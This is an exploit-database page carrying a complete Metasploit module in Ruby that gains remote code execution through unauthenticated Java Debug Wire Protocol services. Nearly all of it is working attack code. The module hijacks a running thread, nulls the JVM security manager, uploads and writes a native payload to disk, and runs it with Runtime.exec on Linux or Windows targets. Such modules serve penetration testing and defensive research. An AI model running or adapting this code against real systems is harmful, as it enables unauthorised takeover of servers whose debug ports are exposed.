Java Debug Wire Protocol Remote Code Execution Exploit

2014-06-17T00:00:00
ID 1337DAY-ID-22338
Type zdt
Reporter metasploit
Modified 2014-06-17T00:00:00

Description

This Metasploit module abuses exposed Java Debug Wire Protocol services in order to execute arbitrary Java code remotely. It just abuses the protocol features, since no authentication is required if the service is enabled.

                                        
                                            ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  HANDSHAKE                 = "JDWP-Handshake"

  REQUEST_PACKET_TYPE       = 0x00
  REPLY_PACKET_TYPE         = 0x80

  # Command signatures
  VERSION_SIG               = [1, 1]
  CLASSESBYSIGNATURE_SIG    = [1, 2]
  ALLCLASSES_SIG            = [1, 3]
  ALLTHREADS_SIG            = [1, 4]
  IDSIZES_SIG               = [1, 7]
  CREATESTRING_SIG          = [1, 11]
  SUSPENDVM_SIG             = [1, 8]
  RESUMEVM_SIG              = [1, 9]
  SIGNATURE_SIG             = [2, 1]
  FIELDS_SIG                = [2, 4]
  METHODS_SIG               = [2, 5]
  GETVALUES_SIG             = [2, 6]
  CLASSOBJECT_SIG           = [2, 11]
  SETSTATICVALUES_SIG       = [3, 2]
  INVOKESTATICMETHOD_SIG    = [3, 3]
  CREATENEWINSTANCE_SIG     = [3, 4]
  REFERENCETYPE_SIG         = [9, 1]
  INVOKEMETHOD_SIG          = [9, 6]
  STRINGVALUE_SIG           = [10, 1]
  THREADNAME_SIG            = [11, 1]
  THREADSUSPEND_SIG         = [11, 2]
  THREADRESUME_SIG          = [11, 3]
  THREADSTATUS_SIG          = [11, 4]
  EVENTSET_SIG              = [15, 1]
  EVENTCLEAR_SIG            = [15, 2]
  EVENTCLEARALL_SIG         = [15, 3]

  # Other codes
  MODKIND_COUNT             = 1
  MODKIND_THREADONLY        = 2
  MODKIND_CLASSMATCH        = 5
  MODKIND_LOCATIONONLY      = 7
  MODKIND_STEP              = 10
  EVENT_BREAKPOINT          = 2
  EVENT_STEP                = 1
  SUSPEND_EVENTTHREAD       = 1
  SUSPEND_ALL               = 2
  NOT_IMPLEMENTED           = 99
  VM_DEAD                   = 112
  INVOKE_SINGLE_THREADED    = 2
  TAG_OBJECT                = 76
  TAG_STRING                = 115
  TYPE_CLASS                = 1
  TAG_ARRAY                 = 91
  TAG_VOID                  = 86
  TAG_THREAD                = 116
  STEP_INTO                 = 0
  STEP_MIN                  = 0
  THREAD_SLEEPING_STATUS     = 2

  def initialize
    super(
      'Name'           => 'Java Debug Wire Protocol Remote Code Execution',
      'Description'    => %q{
        This module abuses exposed Java Debug Wire Protocol services in order
        to execute arbitrary Java code remotely. It just abuses the protocol
        features, since no authentication is required if the service is enabled.
      },
      'Author'         => [
        'Michael Schierl', # Vulnerability discovery / First exploit seen / Msf module help
        'Christophe Alladoum', # JDWP Analysis and Exploit
        'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
      ],
      'References'     =>
        [
          ['OSVDB', '96066'],
          ['EDB', '27179'],
          ['URL', 'http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html'],
          ['URL', 'http://seclists.org/nmap-dev/2010/q1/867'],
          ['URL', 'https://github.com/schierlm/JavaPayload/blob/master/JavaPayload/src/javapayload/builder/JDWPInjector.java'],
          ['URL', 'https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'],
          ['URL', 'http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html']
        ],
      'Platform'       => %w{ linux win },
      'Arch'           => ARCH_X86,
      'Payload'        =>
        {
          'Space'        => 2048,
          'BadChars'    => '',
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'Linux x86 (Native Payload)',
            {
                'Platform' => 'linux'
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win'
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'Mar 12 2010'
    )

    register_options(
      [
        Opt::RPORT(8000),
        OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]),
        OptString.new('TMP_PATH', [ false, 'A directory where we can write files. Ensure there is a trailing slash']),
      ], self.class)

    register_advanced_options(
      [
        OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]),
      ], self.class)
  end

  def check
    connect
    res = handshake
    disconnect

    if res.nil?
      return Exploit::CheckCode::Unknown
    elsif res == HANDSHAKE
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end


  def peer
    "#{rhost}:#{rport}"
  end

  def default_timeout
    datastore['RESPONSE_TIMEOUT']
  end

  # Establishes handshake with the server
  def handshake
    sock.put(HANDSHAKE)
    return sock.get(datastore['RESPONSE_TIMEOUT'])
  end

  # Forges packet for JDWP protocol
  def create_packet(cmdsig, data="")
    flags = 0x00
    cmdset, cmd = cmdsig
    pktlen = data.length + 11
    buf = [pktlen, @my_id, flags, cmdset, cmd]
    pkt = buf.pack("NNCCC")
    pkt << data
    @my_id += 2
    pkt
  end

  # Reads packet response for JDWP protocol
  def read_reply(timeout = default_timeout)
    response = sock.get(timeout)
    fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response
    pktlen, id, flags, errcode = response.unpack('NNCn')
    response.slice!(0..10)
    if errcode != 0 && flags == REPLY_PACKET_TYPE
      fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{errcode}")
    end
    response
  end

  # Returns the characters contained in the string defined in target VM
  def solve_string(data)
    sock.put(create_packet(STRINGVALUE_SIG, data))
    response = read_reply
    return "" unless response
    return read_string(response)
  end

  # Unpacks received string structure from the server response into a normal string
  def read_string(data)
    data_len = data.unpack('N')[0]
    data.slice!(0..3)
    return data.slice!(0,data_len)
  end

  # Creates a new string object in the target VM and returns its id
  def create_string(data)
    buf = build_string(data)
    sock.put(create_packet(CREATESTRING_SIG, buf))
    buf = read_reply
    return parse_entries(buf, [[@vars['objectid_size'], "obj_id"]], false)
  end

  # Packs normal string into string structure for target VM
  def build_string(data)
    ret = [data.length].pack('N')
    ret << data

    ret
  end

  # Pack Fixnum for JDWP protocol
  def format(fmt, value)
    if fmt == "L" || fmt == 8
      return [value].pack('Q>')
    elsif fmt == "I" || fmt == 4
      return [value].pack('N')
    end

    fail_with(Failure::Unknown, "Unknown format")
  end

  # Unpack Fixnum from JDWP protocol
  def unformat(fmt, value)
    if fmt == "L" || fmt == 8
      return value[0..7].unpack('Q>')[0]
    elsif fmt == "I" || fmt == 4
      return value[0..3].unpack('N')[0]
    end

    fail_with(Failure::Unknown, "Unknown format")
  end

  # Parses given data according to a set of formats
  def parse_entries(buf, formats, explicit=true)
    entries = []

    if explicit
      nb_entries = buf.unpack('N')[0]
      buf.slice!(0..3)
    else
      nb_entries = 1
    end

    nb_entries.times do |var|

      if var != 0 && var % 1000 == 0
        vprint_status("#{peer} - Parsed #{var} classes of #{nb_entries}")
      end

      data = {}

      formats.each do |fmt,name|
        if fmt == "L" || fmt == 8
          data[name] = buf.unpack('Q>')[0]
          buf.slice!(0..7)
        elsif fmt == "I" || fmt == 4
          data[name] = buf.unpack('N')[0]
          buf.slice!(0..3)
        elsif fmt == "S"
          data_len = buf.unpack('N')[0]
          buf.slice!(0..3)
          data[name] = buf.slice!(0,data_len)
        elsif fmt == "C"
          data[name] = buf.unpack('C')[0]
          buf.slice!(0)
        elsif fmt == "Z"
          t = buf.unpack('C')[0]
          buf.slice!(0)
          if t == 115
            data[name] = solve_string(buf.slice!(0..7))
          elsif t == 73
            data[name], buf = buf.unpack('NN')
          end
        else
          fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response")
        end

      end
      entries.append(data)
    end

    entries
  end

  # Gets the sizes of variably-sized data types in the target VM
  def get_sizes
    formats = [
        ["I", "fieldid_size"],
        ["I", "methodid_size"],
        ["I", "objectid_size"],
        ["I", "referencetypeid_size"],
        ["I", "frameid_size"]
    ]
    sock.put(create_packet(IDSIZES_SIG))
    response = read_reply
    entries = parse_entries(response, formats, false)
    entries.each { |e| @vars.merge!(e) }
  end

  # Gets the JDWP version implemented by the target VM
  def get_version
    formats = [
        ["S", "descr"],
        ["I", "jdwp_major"],
        ["I", "jdwp_minor"],
        ["S", "vm_version"],
        ["S", "vm_name"]
    ]
    sock.put(create_packet(VERSION_SIG))
    response = read_reply
    entries = parse_entries(response, formats, false)
    entries.each { |e| @vars.merge!(e) }
  end

  def version
    "#{@vars["vm_name"]} - #{@vars["vm_version"]}"
  end

  def is_java_eight
    version.downcase =~ /1[.]8[.]/
  end

  # Returns reference for all threads currently running on target VM
  def get_all_threads
    sock.put(create_packet(ALLTHREADS_SIG))
    response = read_reply
    num_threads = response.unpack('N').first
    response.slice!(0..3)

    size = @vars["objectid_size"]
    num_threads.times do
      t_id = unformat(size, response[0..size-1])
      @threads[t_id] = nil
      response.slice!(0..size-1)
    end
  end

  # Returns reference types for all classes currently loaded by the target VM
  def get_all_classes
    return unless @classes.empty?

    formats = [
      ["C", "reftype_tag"],
      [@vars["referencetypeid_size"], "reftype_id"],
      ["S", "signature"],
      ["I", "status"]
    ]
    sock.put(create_packet(ALLCLASSES_SIG))
    response = read_reply
    @classes.append(parse_entries(response, formats))
  end

  # Checks if specified class is currently loaded by the target VM and returns it
  def get_class_by_name(name)
    @classes.each do |entry_array|
      entry_array.each do |entry|
        if entry["signature"].downcase == name.downcase
          return entry
        end
      end
    end

    nil
  end

  # Returns information for each method in a reference type (ie. object). Inherited methods are not included.
  # The list of methods will include constructors (identified with the name "<init>")
  def get_methods(reftype_id)
    if @methods.has_key?(reftype_id)
      return @methods[reftype_id]
    end

    formats = [
        [@vars["methodid_size"], "method_id"],
        ["S", "name"],
        ["S", "signature"],
        ["I", "mod_bits"]
    ]
    ref_id = format(@vars["referencetypeid_size"],reftype_id)
    sock.put(create_packet(METHODS_SIG, ref_id))
    response = read_reply
    @methods[reftype_id] = parse_entries(response, formats)
  end

  # Returns information for each field in a reference type (ie. object)
  def get_fields(reftype_id)
    formats = [
            [@vars["fieldid_size"], "field_id"],
            ["S", "name"],
            ["S", "signature"],
            ["I", "mod_bits"]
    ]
    ref_id = format(@vars["referencetypeid_size"],reftype_id)
    sock.put(create_packet(FIELDS_SIG, ref_id))
    response = read_reply
    fields = parse_entries(response, formats)

    fields
  end

  # Returns the value of one static field of the reference type. The field must be member of the reference type
  # or one of its superclasses, superinterfaces, or implemented interfaces. Access control is not enforced;
  # for example, the values of private fields can be obtained.
  def get_value(reftype_id, field_id)
    data = format(@vars["referencetypeid_size"],reftype_id)
    data << [1].pack('N')
    data << format(@vars["fieldid_size"],field_id)

    sock.put(create_packet(GETVALUES_SIG, data))
    response = read_reply
    num_values = response.unpack('N')[0]

    unless (num_values == 1) && (response[4].unpack('C')[0] == TAG_OBJECT)
      fail_with(Failure::Unknown, "Bad response when getting value for field")
    end

    response.slice!(0..4)

    len = @vars["objectid_size"]
    value = unformat(len, response)

    value
  end

  # Sets the value of one static field. Each field must be member of the class type or one of its superclasses,
  # superinterfaces, or implemented interfaces. Access control is not enforced; for example, the values of
  # private fields can be set. Final fields cannot be set.For primitive values, the value's type must match
  # the field's type exactly. For object values, there must exist a widening reference conversion from the
  # value's type to the field's type and the field's type must be loaded.
  def set_value(reftype_id, field_id, value)
    data = format(@vars["referencetypeid_size"],reftype_id)
    data << [1].pack('N')
    data << format(@vars["fieldid_size"],field_id)
    data << format(@vars["objectid_size"],value)

    sock.put(create_packet(SETSTATICVALUES_SIG, data))
    read_reply
  end


  # Checks if specified method is currently loaded by the target VM and returns it
  def get_method_by_name(classname, name, signature = nil)
    @methods[classname].each do |entry|
        if signature.nil?
          return entry if entry["name"].downcase == name.downcase
        else
          if entry["name"].downcase == name.downcase && entry["signature"].downcase == signature.downcase
            return entry
          end
        end
    end

    nil
  end

  # Checks if specified class and method are currently loaded by the target VM and returns them
  def get_class_and_method(looked_class, looked_method, signature = nil)
    target_class = get_class_by_name(looked_class)
    unless target_class
      fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found")
    end

    get_methods(target_class["reftype_id"])
    target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature)
    unless target_method
      fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found")
    end

    return target_class, target_method
  end

  # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept")
  def str_to_fq_class(s)
    i = s.rindex(".")
    unless i
      fail_with(Failure::BadConfig, 'Bad defined break class')
    end

    method = s[i+1..-1] # Subtr of s, from last '.' to the end of the string

    classname = 'L'
    classname << s[0..i-1].gsub(/[.]/, '/')
    classname << ';'

    return classname, method
  end

  # Gets the status of a given thread
  def thread_status(thread_id)
    sock.put(create_packet(THREADSTATUS_SIG, format(@vars["objectid_size"], thread_id)))
    buf = read_reply(datastore['BREAK_TIMEOUT'])
    unless buf
      fail_with(Exploit::Failure::Unknown, "No network response")
    end
    status, suspend_status = buf.unpack('NN')

    status
  end

  # Resumes execution of the application or thread after the suspend command or an event has stopped it
  def resume_vm(thread_id = nil)
    if thread_id.nil?
      sock.put(create_packet(RESUMEVM_SIG))
    else
      sock.put(create_packet(THREADRESUME_SIG, format(@vars["objectid_size"], thread_id)))
    end

    response = read_reply(datastore['BREAK_TIMEOUT'])
    unless response
      fail_with(Exploit::Failure::Unknown, "No network response")
    end

    response
  end

  # Suspend execution of the application or thread
  def suspend_vm(thread_id = nil)
    if thread_id.nil?
      sock.put(create_packet(SUSPENDVM_SIG))
    else
      sock.put(create_packet(THREADSUSPEND_SIG, format(@vars["objectid_size"], thread_id)))
    end

    response = read_reply
    unless response
      fail_with(Exploit::Failure::Unknown, "No network response")
    end

    response
  end

  # Sets an event request. When the event described by this request occurs, an event is sent from the target VM
  def send_event(event_code, args)
    data = [event_code].pack('C')
    data << [SUSPEND_ALL].pack('C')
    data << [args.length].pack('N')

    args.each do |kind,option|
      data << [kind].pack('C')
      data << option
    end

    sock.put(create_packet(EVENTSET_SIG, data))
    response = read_reply
    unless response
      fail_with(Exploit::Failure::Unknown, "#{peer} - No network response")
    end
    return response.unpack('N')[0]
  end

  # Parses a received event and compares it with the expected
  def parse_event(buf, event_id, thread_id)
    len = @vars["objectid_size"]
    return false if buf.length < 10 + len - 1

    r_id = buf[6..9].unpack('N')[0]
    t_id = unformat(len,buf[10..10+len-1])

    return (event_id == r_id) && (thread_id == t_id)
  end

  # Clear a defined event request
  def clear_event(event_code, r_id)
    data = [event_code].pack('C')
    data << [r_id].pack('N')
    sock.put(create_packet(EVENTCLEAR_SIG, data))
    read_reply
  end

  # Invokes a static method. The method must be member of the class type or one of its superclasses,
  # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private
  # methods can be invoked.
  def invoke_static(class_id, thread_id, meth_id, args = [])
    data = format(@vars["referencetypeid_size"], class_id)
    data << format(@vars["objectid_size"], thread_id)
    data << format(@vars["methodid_size"], meth_id)
    data << [args.length].pack('N')

    args.each do |arg|
      data << arg
      data << [0].pack('N')
    end

    sock.put(create_packet(INVOKESTATICMETHOD_SIG, data))
    buf = read_reply
    buf
  end

  # Invokes a instance method. The method must be member of the object's type or one of its superclasses,
  # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods
  # can be invoked.
  def invoke(obj_id, thread_id, class_id, meth_id, args = [])
    data = format(@vars["objectid_size"], obj_id)
    data << format(@vars["objectid_size"], thread_id)
    data << format(@vars["referencetypeid_size"], class_id)
    data << format(@vars["methodid_size"], meth_id)
    data << [args.length].pack('N')

    args.each do |arg|
      data << arg
      data << [0].pack('N')
    end

    sock.put(create_packet(INVOKEMETHOD_SIG, data))
    buf = read_reply
    buf
  end

  # Creates a new object of specified class, invoking the specified constructor. The constructor
  # method ID must be a member of the class type.
  def create_instance(class_id, thread_id, meth_id, args = [])
    data = format(@vars["referencetypeid_size"], class_id)
    data << format(@vars["objectid_size"], thread_id)
    data << format(@vars["methodid_size"], meth_id)
    data << [args.length].pack('N')

    args.each do |arg|
      data << arg
      data << [0].pack('N')
    end

    sock.put(create_packet(CREATENEWINSTANCE_SIG, data))
    buf = read_reply
    buf
  end

  def temp_path
    return nil unless datastore['TMP_PATH']
    unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\')
      fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH')
    end
    datastore['TMP_PATH']
  end

  # Configures payload according to targeted architecture
  def setup_payload
    # 1. Setting up generic values.
    payload_exe = rand_text_alphanumeric(4 + rand(4))
    pl_exe = generate_payload_exe

    # 2. Setting up arch specific...
    case target['Platform']
    when 'linux'
      path = temp_path || '/tmp/'
      payload_exe = "#{path}#{payload_exe}"
      if @os.downcase =~ /win/
        print_warning("#{peer} - #{@os} system detected but using Linux target...")
      end
    when 'win'
      path = temp_path || './'
      payload_exe = "#{path}#{payload_exe}.exe"
      unless @os.downcase =~ /win/
        print_warning("#{peer} - #{@os} system detected but using Windows target...")
      end
    end

    return payload_exe, pl_exe
  end

  # Invokes java.lang.System.getProperty() for OS fingerprinting purposes
  def fingerprint_os(thread_id)
    size = @vars["objectid_size"]

    # 1. Creates a string on target VM with the property to be getted
    cmd_obj_ids = create_string("os.name")
    fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0
    cmd_obj_id = cmd_obj_ids[0]["obj_id"]

    # 2. Gets property
    data = [TAG_OBJECT].pack('C')
    data << format(size, cmd_obj_id)
    data_array = [data]
    runtime_class , runtime_meth = get_class_and_method("Ljava/lang/System;", "getProperty")
    buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
    fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected String") unless buf[0] == [TAG_STRING].pack('C')

    str = unformat(size, buf[1..1+size-1])
    @os = solve_string(format(@vars["objectid_size"],str))
  end

  # Creates a file on the server given a execution thread
  def create_file(thread_id, filename)
    cmd_obj_ids = create_string(filename)
    fail_with(Failure::Unknown, "Failed to allocate string for filename") if cmd_obj_ids.length == 0

    cmd_obj_id = cmd_obj_ids[0]["obj_id"]
    size = @vars["objectid_size"]
    data = [TAG_OBJECT].pack('C')
    data << format(size, cmd_obj_id)
    data_array = [data]
    runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "<init>", "(Ljava/lang/String;)V")
    buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
    fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C')

    file = unformat(size, buf[1..1+size-1])
    fail_with(Failure::Unknown, "Failed to create file. Try to change the TMP_PATH") if file.nil? || (file == 0)

    register_files_for_cleanup(filename)

    file
  end

  # Stores the payload on a new string created in target VM
  def upload_payload(thread_id, pl_exe)
    size = @vars["objectid_size"]
    if is_java_eight
      runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64;", "getDecoder")
      buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
    else
      runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "<init>")
      buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
    end
    unless buf[0] == [TAG_OBJECT].pack('C')
      fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
    end

    decoder = unformat(size, buf[1..1+size-1])
    if decoder.nil? || decoder == 0
      fail_with(Failure::Unknown, "Failed to create Base64 decoder object")
    end

    cmd_obj_ids = create_string("#{Rex::Text.encode_base64(pl_exe)}")
    if cmd_obj_ids.length == 0
      fail_with(Failure::Unknown, "Failed to allocate string for payload dumping")
    end

    cmd_obj_id = cmd_obj_ids[0]["obj_id"]
    data = [TAG_OBJECT].pack('C')
    data << format(size, cmd_obj_id)
    data_array = [data]

    if is_java_eight
      runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64$Decoder;", "decode", "(Ljava/lang/String;)[B")
    else
      runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B")
    end
    buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
    unless buf[0] == [TAG_ARRAY].pack('C')
      fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray")
    end

    pl = unformat(size, buf[1..1+size-1])
    pl
  end

  # Dumps the payload on a opened server file given a execution thread
  def dump_payload(thread_id, file, pl)
    size = @vars["objectid_size"]
    data = [TAG_OBJECT].pack('C')
    data << format(size, pl)
    data_array = [data]
    runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "write", "([B)V")
    buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
    unless buf[0] == [TAG_VOID].pack('C')
      fail_with(Failure::Unknown, "Exception while writing to file")
    end
  end

  # Closes a file on the server given a execution thread
  def close_file(thread_id, file)
    runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close")
    buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"])
    unless buf[0] == [TAG_VOID].pack('C')
      fail_with(Failure::Unknown, "Exception while closing file")
    end
  end

  # Executes a system command on target VM making use of java.lang.Runtime.exec()
  def execute_command(thread_id, cmd)
    size = @vars["objectid_size"]

    # 1. Creates a string on target VM with the command to be executed
    cmd_obj_ids = create_string(cmd)
    if cmd_obj_ids.length == 0
      fail_with(Failure::Unknown, "Failed to allocate string for payload dumping")
    end

    cmd_obj_id = cmd_obj_ids[0]["obj_id"]

    # 2. Gets Runtime context
    runtime_class , runtime_meth = get_class_and_method("Ljava/lang/Runtime;", "getRuntime")
    buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
    unless buf[0] == [TAG_OBJECT].pack('C')
      fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
    end

    rt = unformat(size, buf[1..1+size-1])
    if rt.nil? || (rt == 0)
      fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()")
    end

    # 3. Finds and executes "exec" method supplying the string with the command
    exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec")
    if exec_meth.nil?
      fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()")
    end

    data = [TAG_OBJECT].pack('C')
    data << format(size, cmd_obj_id)
    data_array = [data]
    buf = invoke(rt, thread_id, runtime_class["reftype_id"], exec_meth["method_id"], data_array)
    unless buf[0] == [TAG_OBJECT].pack('C')
      fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
    end
  end

  # Set event for stepping into a running thread
  def set_step_event
    # 1. Select a thread in sleeping status
    t_id = nil
    @threads.each_key do |thread|
      if thread_status(thread) == THREAD_SLEEPING_STATUS
        t_id = thread
        break
      end
    end
    fail_with(Failure::Unknown, "Could not find a suitable thread for stepping") if t_id.nil?

    # 2. Suspend the VM before setting the event
    suspend_vm

    vprint_status("#{peer} - Setting 'step into' event in thread: #{t_id}")
    step_info = format(@vars["objectid_size"], t_id)
    step_info << [STEP_MIN].pack('N')
    step_info << [STEP_INTO].pack('N')
    data = [[MODKIND_STEP, step_info]]

    r_id = send_event(EVENT_STEP, data)
    unless r_id
      fail_with(Failure::Unknown, "Could not set the event")
    end

    return r_id, t_id
  end

  # Disables security manager if it's set on target JVM
  def disable_sec_manager
    sys_class = get_class_by_name("Ljava/lang/System;")

    fields = get_fields(sys_class["reftype_id"])

    sec_field = nil

    fields.each do |field|
      sec_field = field["field_id"] if field["name"].downcase == "security"
    end

    fail_with(Failure::Unknown, "Security attribute not found") if sec_field.nil?

    value = get_value(sys_class["reftype_id"], sec_field)

    if(value == 0)
      print_good("#{peer} - Security manager was not set")
    else
      set_value(sys_class["reftype_id"], sec_field, 0)
      if get_value(sys_class["reftype_id"], sec_field) == 0
        print_good("#{peer} - Security manager has been disabled")
      else
        print_good("#{peer} - Security manager has not been disabled, trying anyway...")
      end
    end
  end

  # Uploads & executes the payload on the target VM
  def exec_payload(thread_id)
    # 0. Fingerprinting OS
    fingerprint_os(thread_id)

    vprint_status("#{peer} - Executing payload on \"#{@os}\", target version: #{version}")

    # 1. Prepares the payload
    payload_exe, pl_exe = setup_payload

    # 2. Creates file on server for dumping payload
    file = create_file(thread_id, payload_exe)

    # 3. Uploads payload to the server
    pl = upload_payload(thread_id, pl_exe)

    # 4. Dumps uploaded payload into file on the server
    dump_payload(thread_id, file, pl)

    # 5. Closes the file on the server
    close_file(thread_id, file)

    # 5b. When linux arch, give execution permissions to file
    if target['Platform'] == 'linux'
      cmd = "chmod +x #{payload_exe}"
      execute_command(thread_id, cmd)
    end

    # 6. Executes the dumped payload
    cmd = "#{payload_exe}"
    execute_command(thread_id, cmd)
  end


  def exploit
    @my_id = 0x01
    @vars = {}
    @classes = []
    @methods = {}
    @threads = {}
    @os = nil

    connect

    unless handshake == HANDSHAKE
      fail_with(Failure::NotVulnerable, "JDWP Protocol not found")
    end

    print_status("#{peer} - Retrieving the sizes of variable sized data types in the target VM...")
    get_sizes

    print_status("#{peer} - Getting the version of the target VM...")
    get_version

    print_status("#{peer} - Getting all currently loaded classes by the target VM...")
    get_all_classes

    print_status("#{peer} - Getting all running threads in the target VM...")
    get_all_threads

    print_status("#{peer} - Setting 'step into' event...")
    r_id, t_id = set_step_event

    print_status("#{peer} - Resuming VM and waiting for an event...")
    response = resume_vm

    unless parse_event(response, r_id, t_id)
      datastore['NUM_RETRIES'].times do |i|
        print_status("#{peer} - Received #{i + 1} responses that are not a 'step into' event...")
        buf = read_reply
        break if parse_event(buf, r_id, t_id)

        if i == datastore['NUM_RETRIES']
          fail_with(Failure::Unknown, "Event not received in #{datastore['NUM_RETRIES']} attempts")
        end
      end
    end

    vprint_status("#{peer} - Received matching event from thread #{t_id}")
    print_status("#{peer} - Deleting step event...")
    clear_event(EVENT_STEP, r_id)

    print_status("#{peer} - Disabling security manager if set...")
    disable_sec_manager

    print_status("#{peer} - Dropping and executing payload...")
    exec_payload(t_id)

    disconnect
  end
end

#  0day.today [2018-01-01]  #